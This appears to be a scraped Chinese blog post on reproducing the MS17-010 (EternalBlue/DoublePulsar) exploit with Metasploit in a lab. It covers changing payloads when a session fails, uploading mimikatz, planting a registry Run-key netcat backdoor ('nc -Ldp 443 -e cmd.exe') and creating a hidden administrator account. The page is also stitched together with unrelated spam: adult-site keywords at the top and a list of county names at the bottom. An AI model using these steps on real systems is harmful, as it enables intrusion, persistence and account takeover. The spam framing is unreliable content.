最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

(Metasploit) MS17-010 漏洞復(fù)現(xiàn)典中典之雙脈沖星 Doublepulsar 模塊攻擊失敗及其解決

2022-11-20 16:32 作者:Wheat200  | 我要投稿

以下過程全部經(jīng)由 Kali Linux,省略掉了那些大家都知道的內(nèi)容。


對(duì)于32位的靶機(jī),永恒之藍(lán)不能工作,因此獲取并配置雙脈沖星模塊,使用前,確認(rèn)?Wine32?狀態(tài)正常,設(shè)置攻擊參數(shù),但攻擊失敗了,信息顯示

Remote code execution... 3... 2... 1...?

Exploit completed, but no session was created.


在查閱了能找到的資料后,最終我的成功方案是更換載荷(payload)

下面列出該模塊幾個(gè)最通用的載荷

windows/meterpreter/reverse_tcp

windows/meterpreter/bind_tcp

windows/shell/reverse_tcp

windows/shell/bind_tcp


在我的測(cè)試過程中,大多數(shù)情況下設(shè)置載荷為?windows/meterpreter/bind_tcp 后運(yùn)行就能得到會(huì)話,盡管?reverse_tcp 的安全性高于?bind_tcp,但很無奈,前者就是不干活(很奇怪)。


漏洞利用成功后可能出現(xiàn)的一些其他情況:


如果靶機(jī)的 Shell 執(zhí)行指令后回顯亂碼,鍵入

chcp 65001

通常可以大幅改善情況


有些時(shí)候靶機(jī)會(huì)因被攻擊而在一分鐘內(nèi)重啟,這種情況下可以考慮使用 Netcat?完成持久化工作,Meterpreter 下鍵入

upload /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe C:\\windows

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe'

這樣我們等待靶機(jī)重啟后,鍵入指令進(jìn)行連接

nc -v [靶機(jī)ip]?443


嘗試遠(yuǎn)程桌面登錄但 Administrator 賬戶密碼為空( hashdump?因此報(bào)錯(cuò) )而導(dǎo)致無法登錄時(shí),使用靶機(jī) Shell 新建一個(gè)賬戶和密碼并將其加入管理員,然后用這個(gè)賬戶登錄

net user [username] [passwd] /add

net localgroup administrators [username]?/add

(Metasploit) MS17-010 漏洞復(fù)現(xiàn)典中典之雙脈沖星 Doublepulsar 模塊攻擊失敗及其解決的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國家法律
鄂尔多斯市| 山丹县| 湘阴县| 渭南市| 丘北县| 石屏县| 玉环县| 武胜县| 巴楚县| 铜陵市| 乌拉特前旗| 崇明县| 儋州市| 古浪县| 壶关县| 旺苍县| 嵊州市| 六安市| 博白县| 清镇市| 连州市| 阳高县| 宜都市| 昌都县| 乌拉特前旗| 始兴县| 甘孜| 廊坊市| 青冈县| 盖州市| 泸州市| 鸡东县| 郑州市| 白山市| 司法| 瑞丽市| 东莞市| 新野县| 尉氏县| 香河县| 定边县|